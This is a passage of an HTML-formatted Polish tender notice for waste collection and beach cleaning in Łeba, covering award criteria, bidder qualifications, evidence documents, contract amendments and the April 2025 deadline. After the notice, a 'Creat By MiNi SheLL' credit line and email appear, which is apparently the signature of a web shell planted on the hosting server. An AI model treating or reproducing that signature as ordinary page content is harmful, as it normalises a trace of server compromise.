ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ilość dodatkowych pojazdów – zamiatarek samojezdnych - do sprzątania wejść na plaże - jakimi dysponuje Wykonawca</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostarczenie dodatkowej ilości pojemników (beczek) o pojemności 200 l wraz z ich ustawieniem – na terenie uzgodnionym z Zamawiającym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w Dziale VI SWZ, oraz spełniają warunki udziału w postępowaniu dotyczące.<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek jeżeli posiada wymagane prawem uprawnienia do gospodarowania odpadami w zakresie objętym przedmiotem zamówienia tj.:<br/>a.	jest wpisany do Rejestru Działalności Regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Miejskiej Łeba, zgodnie z wymogami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2024 r. poz. 399 z późn. zm.) w obrębie kategorii odpadów objętych zamówieniem;<br/>b. jest wpisany do rejestru (BDO) podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami, prowadzonym przez marszałka zgodnie z art. 49 i 50 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2023 r. poz. 1587 z późn. zm.) (Dział VII – tabela 1 w zakresie transportu odpadów objętych przedmiotem zamówienia);<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca:<br/>- posiada niezbędną zdolność techniczną:<br/>a.	co najmniej 5 pojazdów przystosowanych do odbierania odpadów komunalnych, w tym:<br/>•	dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych,<br/>•	dwa pojazdy przystosowane do odbierania selektywnie zbieranych odpadów komunalnych,<br/>•	jeden pojazd do odbierania odpadów bez funkcji kompaktującej – z napędem 4x4<br/><br/>b.	bazę magazynowo-transportową spełniającą wymogi określone w rozporządzeniu Ministra Środowiska z dnia 11.01.2013 w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013, poz. 122) – usytuowaną w gminie, z której terenu odbiera te odpady, lub w odległości nie większej niż 60 km od granicy tej gminy;<br/>c. przedstawi wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum dwie usługi, które w swoim zakresie miały usługę sprzątania.<br/><br/>UWAGA:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy<br/>warunek musi spełniać w całości co najmniej jeden z tych Wykonawców.<br/>W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w myśl art. 118 ustawy Pzp, powyższy warunek musi spełniać w całości podmiot udostępniający zasoby.<br/>W przypadku składania oferty wspólnej warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postępowaniu:<br/>1)	wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum dwie usługi, które w swoim zakresie miały usługę sprzątania <br/>- z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty (wzór wykazu - załącznik nr 5 do SWZ);<br/>2)	wykazu pojazdów i bazy magazynowo-transportowej – wykonawca przedstawi na załączniku nr 8 wykaz pojazdów i bazy magazynowo – transportowej - którymi dysponuje zgodnie z działem IX SWZ<br/>2. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w zakresie i sposób określony w przepisach rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452). Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają jeden lub kilka dokumentów tak, aby<br/>wspólnie udokumentować spełnianie warunków podmiotowych, brak podstaw do wykluczenia oraz dotyczących przedmiotu<br/>zamówienia. Wymagane oświadczenia należy złożyć w sposób wyraźnie wskazujący, iż oświadczenie składają wszyscy<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego. Nadto, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia publicznego, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Stosowne<br/>pełnomocnictwo musi zostać opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym, lub podpisem<br/>osobistym. Wspólnicy spółki cywilnej traktowani są jak wykonawcy ubiegający się wspólnie o udzielenie zamówienia<br/>publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Bez pisemnej zgody Zamawiającego Wykonawca nie może przenieść na osoby trzecie wierzytelności, wynikającej z<br/>niniejszej umowy.<br/>2. Wszelkie zmiany do Umowy wymagają pisemnego aneksu podpisanego przez strony pod rygorem nieważności.<br/>3. Zamawiający, w terminie realizacji zamówienia w szczególnie uzasadnionych przypadkach, dopuszcza wprowadzenie<br/>zmiany w postanowieniach zawartej umowy w następujących sytuacjach:<br/>1) Wykonawca zaproponuje wykonanie umowy na warunkach bardziej korzystnych niż zaproponował to w ofercie:<br/>W takim przypadku Zamawiający uprawniony jest do zmiany umowy w zakresie zaproponowanym przez Wykonawcę i<br/>zaakceptowanym przez Zamawiającego.<br/>Zmiany umowy nie mogą dotyczyć zobowiązań Wykonawcy zawartych w ofercie, chyba, że zobowiązania te w ocenie<br/>Zamawiającego są wyższe (lepsze) od oferowanych przez Wykonawcę w ofercie, a cena oferty nie ulegnie zmianie.<br/>2) Cena jednostkowa ulegnie zmianie na skutek zmiany stawek podatkowych dla przedmiotu zamówienia, w takim<br/>przypadku zmianie ulega cena jednostkowa brutto, przy zachowaniu ceny jednostkowej netto.<br/>3) W trakcie trwania umowy Wykonawca może zaoferować Zamawiającemu rabat na zasadach uzgodnionych przez Strony.<br/>W takim przypadku Zamawiający uprawniony jest do zmiany umowy w zakresie zaproponowanym przez Wykonawcę i<br/>zaakceptowanym przez Zamawiającego.<br/>4. Niezależnie od powyższego, Strony dopuszczają możliwość zmian redakcyjnych Umowy oraz zmian będących<br/>następstwem zmian danych Stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia<br/>realizacji przedmiotu umowy, w szczególności obniżających koszt ponoszony przez Zamawiającego, utrzymanie lub<br/>użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, strony wprowadzą<br/>do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane<br/>wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą<br/>równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy,<br/>określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa ofertę, za pośrednictwem platformy zakupowej e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-11 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com